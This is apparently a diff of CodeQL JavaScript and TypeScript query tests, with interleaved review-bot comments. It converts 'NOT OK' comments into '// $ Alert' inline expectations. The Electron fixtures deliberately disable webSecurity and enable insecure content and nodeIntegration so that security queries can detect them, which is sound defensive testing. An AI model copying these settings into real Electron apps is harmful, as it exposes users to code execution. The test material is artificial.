a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref @@ -1 +1,2 @@ -Declarations/UnreachableMethodOverloads.ql +query: Declarations/UnreachableMethodOverloads.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts 
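Review bot: In `UniquePropertyNames/tst2.js` the `// $ Alert` added on the closing `},` of `setX` does not say what clobbers the property, unlike the sibling `tst.js` hunk, which keeps `// $ Alert - clobbered by ...` on every flagged line. Because the marker sits on the last line of a multi-line property, a reader also has to work out that it belongs to `setX` and not to `getX` just below. Consider `}, // $ Alert - setX is defined again later in this object`, assuming the duplicate is a later `setX`. The object literal continues outside the hunk, so that should be checked against the full file.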
@@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. 
diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js index bc215a3b6983..a7ec4ead8979 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js @@ -2,7 +2,7 @@ import { AudioService } from './audio' import { StoreService } from './store'; export const services = [ - AudioService, + AudioService, // $ Alert StoreService ]; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref index f8f5f52dffc2..d77733eeada1 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref @@ -1 +1,2 @@ -Declarations/UnstableCyclicImport.ql +query: Declarations/UnstableCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 
--- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts @@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected 
@@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref index b04f67ab67e4..840ecd233e83 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref @@ -1 +1,2 @@ -Declarations/UnusedParameter.ql +query: Declarations/UnusedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts @@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } 
@@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..89e4ed305f36 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,16 +21,15 @@ function K(x, y) { return y; } -// NOT OK /** * @param {*} x the first argument * @param {*} y the second argument */ -function K(x, y) { +function K(x, y) { // $ Alert return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref index 9583241c2f0d..0dca4ee68e4e 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref @@ -1 +1,2 @@ -Declarations/UnusedProperty.ql +query: Declarations/UnusedProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js index 847f30bd9443..d5e1525afac5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js 
+++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js @@ -1,7 +1,7 @@ (function(){ var captured1 = { used1: 42, - unused1: 42 + unused1: 42 // $ Alert }; captured1.used1; @@ -16,20 +16,20 @@ f(...{used6: 42}); [...{used7: 42}]; ({...{used8: 42}}); - ({ unused9: 42 }) + ""; + ({ unused9: 42 }) + ""; // $ Alert ({ used10: 42 }).hasOwnProperty; ({ used10: 42 }).propertyIsEnumerable; (function(){ var captured11 = { used11: 42, - unused11: 42 + unused11: 42 // $ Alert }; captured11.used11; var captured12 = { - used12_butNotReally: 42, - unused12: 42 + used12_butNotReally: 42, // $ Alert + unused12: 42 // $ Alert }; throw x; @@ -49,10 +49,10 @@ }); var captured14 = { - unused14: 42 + unused14: 42 // $ Alert }; - captured14.unused14 = 42; - captured14.unused14 = 42; + captured14.unused14 = 42; // $ Alert + captured14.unused14 = 42; // $ Alert var captured15 = { diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts index 7ad7c508df8d..7906faf06c98 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts @@ -21,7 +21,7 @@ class C { } (function(){ - var o1: any = { p: 42, q: 42 }; + var o1: any = { p: 42, q: 42 }; // $ Alert o1.q; var o2: any = { p: 42, q: 42 }; var o3: { p: int, q: int } = o2; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx 
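Review bot: In `UnusedProperty/tst2.ts` the new `// $ Alert` on `var o1: any = { p: 42, q: 42 };` does not name the property it refers to, although the line declares two. `o1.q` is read on the next line, so the result is presumably for `p`, but the marker alone does not say so. Spelling it out keeps the test self-explanatory: `var o1: any = { p: 42, q: 42 }; // $ Alert - 'p' is never read`. The enclosing function continues outside the hunk.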
@@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
    Hello
    ); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..c90e8f8abb80 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; // $ Alert type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js index b32fa341a832..be4b41caefb9 100644 
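Review bot: In interTypes.ts the annotation on the import line flips from `// OK` to `// $ Alert`, so a result the old comment described as unwanted becomes the expected outcome with no explanation. The context line in the same hunk uses `Foo` in `infer S extends Foo`, so at least that binding looks used; whether `Bar` is used is not visible here. If the alert is a known false positive, record it as one, e.g. `import { Foo, Bar } from "somewhere"; // $ SPURIOUS: Alert`, so the test documents the gap rather than endorsing it. If it is a true positive, a short reason after the marker (as in `// $ Alert - not used` in importPragma.jsx) would make the change of intent clear.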
--- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js @@ -1,4 +1,4 @@ -import {a, b, c, d} from 'x'; -import {ordered, alphabetically} from 'x'; +import {a, b, c, d} from 'x'; // $ Alert +import {ordered, alphabetically} from 'x'; // $ Alert c(); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js 
@@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts 
@@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts 
@@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref index 35bbe5f2d4d1..2b32814badbe 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref @@ -1 +1,2 @@ -Electron/AllowRunningInsecureContent.ql \ No newline at end of file +query: Electron/AllowRunningInsecureContent.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js index 01828a0b9fd9..d1a878a6f846 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js 
@@ -3,8 +3,8 @@ const {BrowserWindow} = require('electron') function test() { var unsafe_used = { webPreferences: { - webSecurity: false, - allowRunningInsecureContent: true, + webSecurity: false, // $ Alert[js/disabling-electron-websecurity] + allowRunningInsecureContent: true, // $ Alert[js/enabling-electron-insecure-content] experimentalFeatures: true, enableBlinkFeatures: ['ExecCommandInJavaScript'], blinkFeatures: 'CSSVariables' diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref index c2907c3bd577..7dcd5b81dbff 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref @@ -1 +1,2 @@ -Electron/DisablingWebSecurity.ql \ No newline at end of file +query: Electron/DisablingWebSecurity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..25500de34863 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected 
@@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // im ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,32 +1,32 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, plugins: true, webSecurity: true, sandbox: true - } + } // $ Alert }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // `nodeIntegrationInWorker` enabled webPreferences: { plugins: 